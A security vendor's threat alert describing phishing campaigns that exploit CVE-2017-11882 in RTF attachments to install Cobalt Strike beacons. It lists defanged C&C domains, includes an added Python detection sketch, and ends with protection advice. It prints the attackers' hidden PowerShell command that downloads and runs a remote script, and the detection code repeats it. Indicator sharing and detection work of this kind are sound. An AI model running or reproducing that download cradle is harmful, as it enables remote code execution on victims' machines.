Security researchers recently analyzed several spam campaigns that deliver Cobalt Strike payloads and found that the attackers use those payloads to execute malicious actions on the compromised systems.

Online criminals are taking advantage of a vulnerability in Microsoft Office to spread malware using a component of the penetration testing tool Cobalt Strike.

One of these spear phishing campaigns was delivered with the following content (sanitized for your protection).

Here’s what the spoofed email looks like:

From: [Spoof / Forwarded Sender Address]
Subject Line:
Attached file:

Source: CVE Details

The malicious actors bait victims with a malicious RTF document that carries a PowerShell payload exploiting CVE-2017-11882. According to a report from Security Week, this security flaw had been present in Office products for over 17 years. Fortunately, Microsoft patched it last November in its monthly security updates.

In short, the attackers send potential victims an email with a malicious RTF document attached and labeled “request”. If the computer isn’t properly updated, opening the RTF document executes the following PowerShell command:

PowerShell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://46.21.147[.]61:80/a'))"

Researchers found a similar spam campaign in which the same exploit and PowerShell command were used, with the payload delivered through the following redirect chain:

https://bankosantantder[.]com/document/view/1567/
-> https://servicenetupdate[.]com/a9lV

During their analysis, researchers discovered that the server the PowerShell script connects to hosts Meterpreter’s Reverse HTTPS Stager, from which the payload retrieves the malware infection (sanitized for your online safety):

https://helpdeskoracle[.]com/Winn

This page delivers the Cobalt Strike downloader that gives the attackers easier access to the victim’s system. An obfuscated JavaScript that acts as the downloader is executed through the Microsoft HTML Application Host (mshta.exe), a legitimate Windows component located in the system folder.

The malicious code is then dropped on the victim’s system as %APPDATA%\[random filename].ps1 and executed to load both the 32-bit and 64-bit versions of the “Cobalt Strike Beacon” (as these files are named) directly into memory.

From this point on, the malware operators can control the victim’s system and execute a wide range of commands through the PowerShell command line.
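The infection chain described above leaves a recognizable trail in endpoint telemetry: an Office component spawning a hidden PowerShell download cradle, mshta.exe fetching a remote script, a .ps1 file dropped under %APPDATA%, and rundll32.exe talking to one of the listed domains. The following detection sketch is an added example, not code from the original alert or from CSIS; it scans constructed Sysmon-style event lines for those behaviours. The domain spellings come from the alert with extraction spaces removed and are kept defanged; the event format, file names, the TEST-NET IP address and the mshta command line are constructed assumptions. EQNEDT32.EXE is the Office Equation Editor binary affected by CVE-2017-11882.

```python
"""Detection sketch for the Cobalt Strike delivery chain described in the alert.
Added example; all events below are constructed samples, not real telemetry."""
import re

# Indicators quoted in the alert, kept defanged ("[.]"). refang() normalizes them
# so the same matcher works on real (non-defanged) telemetry.
C2_DOMAINS = {
    "oracleupdatenews[.]com", "updatetechnews[.]com", "networkschecker[.]com",
    "globalmedicaltrade[.]com", "cobaltcode[.]org", "servicenetupdate[.]com",
    "bankosantantder[.]com", "helpdeskoracle[.]com",
}

# Office binaries that should never spawn a scripting host. EQNEDT32.EXE is the
# Equation Editor component exploited by CVE-2017-11882 (known fact, not from the page).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

CRADLE_RE = re.compile(r"(iex|invoke-expression).*(downloadstring|downloadfile)", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b", re.I)
APPDATA_PS1_RE = re.compile(r"(%appdata%|\\appdata\\roaming)\\[^\\\s]+\.ps1", re.I)
REMOTE_SCRIPT_RE = re.compile(r"https?://|javascript:|vbscript:", re.I)


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its plain form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


REFANGED_C2 = {refang(d) for d in C2_DOMAINS}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Constructed 'key=value|key=value' event format (assumption, not Sysmon's own)."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def analyze(line: str) -> list:
    """Return the list of detection names that fire for one event line."""
    ev = parse_event(line)
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    findings = []
    if ev.get("EventType") == "ProcessCreate":
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append(f"office-spawned-{image}")
        if image == "powershell.exe" and CRADLE_RE.search(cmd) and HIDDEN_RE.search(cmd):
            findings.append("hidden-powershell-download-cradle")
        if image == "mshta.exe" and REMOTE_SCRIPT_RE.search(cmd):
            findings.append("mshta-remote-script")
        if APPDATA_PS1_RE.search(cmd):
            findings.append("ps1-dropped-in-appdata")
    elif ev.get("EventType") == "NetworkConnect":
        dest = refang(ev.get("DestinationHostname", "").lower())
        if dest in REFANGED_C2:
            findings.append(f"known-c2-{dest}")
            if image == "rundll32.exe":
                findings.append("rundll32-to-c2")
    return findings


def scan(lines) -> list:
    """Return [(index, findings)] for every event that triggered at least one detection."""
    hits = []
    for i, line in enumerate(lines):
        f = analyze(line)
        if f:
            hits.append((i, f))
    return hits


# Constructed sample events following the chain in the alert (198.51.100.7 is a
# TEST-NET placeholder standing in for the downloader host).
SAMPLE_EVENTS = [
    "EventType=ProcessCreate|ParentImage=C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=PowerShell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://198.51.100.7:80/a'))",
    "EventType=ProcessCreate|ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta.exe https://helpdeskoracle[.]com/Winn",
    "EventType=ProcessCreate|ParentImage=C:\\Windows\\System32\\mshta.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -ep bypass -w hidden -f C:\\Users\\victim\\AppData\\Roaming\\k3jd9.ps1",
    "EventType=NetworkConnect|Image=C:\\Windows\\System32\\rundll32.exe|DestinationHostname=oracleupdatenews[.]com",
    # Benign baseline: an interactive PowerShell session started from Explorer.
    "EventType=ProcessCreate|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe Get-ChildItem",
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(found)}")
```

The benign last event produces no finding, which is the point of pairing the parent-process rule with the command-line rules: PowerShell alone is normal, PowerShell launched by Equation Editor with a hidden-window download cradle is not.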

This video shows how the Cobalt Strike Beacon is actually used.

After that, a .jar file (Java Archive) is downloaded and run from the following URLs:

https://servicenetupdate[.]com/a9lV
https://bankosantantder[.]com/applet_signed.jar

Researchers believe that the criminals may have used this phishing campaign to target a major financial institution, Santander Bank. The JAR file contains two DLL files that connect through rundll32.exe to the following C&C servers:

oracleupdatenews[.]com
updatetechnews[.]com

The following C&C servers might also be related to the same malicious actors:

networkschecker[.]com
networkschecker[.]networks
globalmedicaltrade[.]com
cobaltcode[.]org (hosting a decoy page)

Heimdal Security proactively blocked these infected domains, so all Heimdal™ Threat Prevention and Endpoint Security Suite users are protected.

According to VirusTotal, 25 of 58 antivirus engines detected this .jar archive as malicious.

As for the malicious RTF document, which triggers the infection via the targeted email campaign, it was detected by 24 of 59 antivirus products on VirusTotal at the time we published this alert.

Protection guide

This type of malware usually evades initial detection, so it’s vital to take all the security measures needed to keep your data safe.

  • Update your Windows operating system NOW, because that’s the first place cyber criminals look for software vulnerabilities to exploit, exactly as happened in these spam campaigns. Also, make sure all the apps and programs on your PC have the latest updates;
  • Always keep a backup of all your important data on an external source such as an external hard drive or a cloud service (Google Drive, Dropbox, etc.). Use this guide to learn more;
  • We’ll keep repeating it: use strong and unique passwords to increase the protection of your accounts. Our dedicated security guide will show you how to better manage your passwords;
  • DO NOT open emails or click on attachments/files that look suspicious to you, because attackers will continue to use new methods to infect your computer;
  • You know that prevention is the cure, so avoid visiting suspicious websites or downloading anything from them. Also, prefer pages served over “https”;
  • Make sure you have a reliable antivirus program installed on your computer to protect your valuable data from online threats;
  • It is also safer to add multiple layers of protection and use a proactive cybersecurity software solution as well;
  • Probably one of the best security measures you can take is learning how to easily spot such online threats. We recommend these free educational resources to gain more knowledge about the cybersecurity industry.

Malicious actors will always look for software vulnerabilities, whether old or new, to exploit in spam campaigns like the ones shown above. Once again, this reminds us of the importance of software patching and why it is VITAL for everyone to keep their systems updated.

Stay safe!

*This article features cyber intelligence provided by CSIS Security Group researchers.

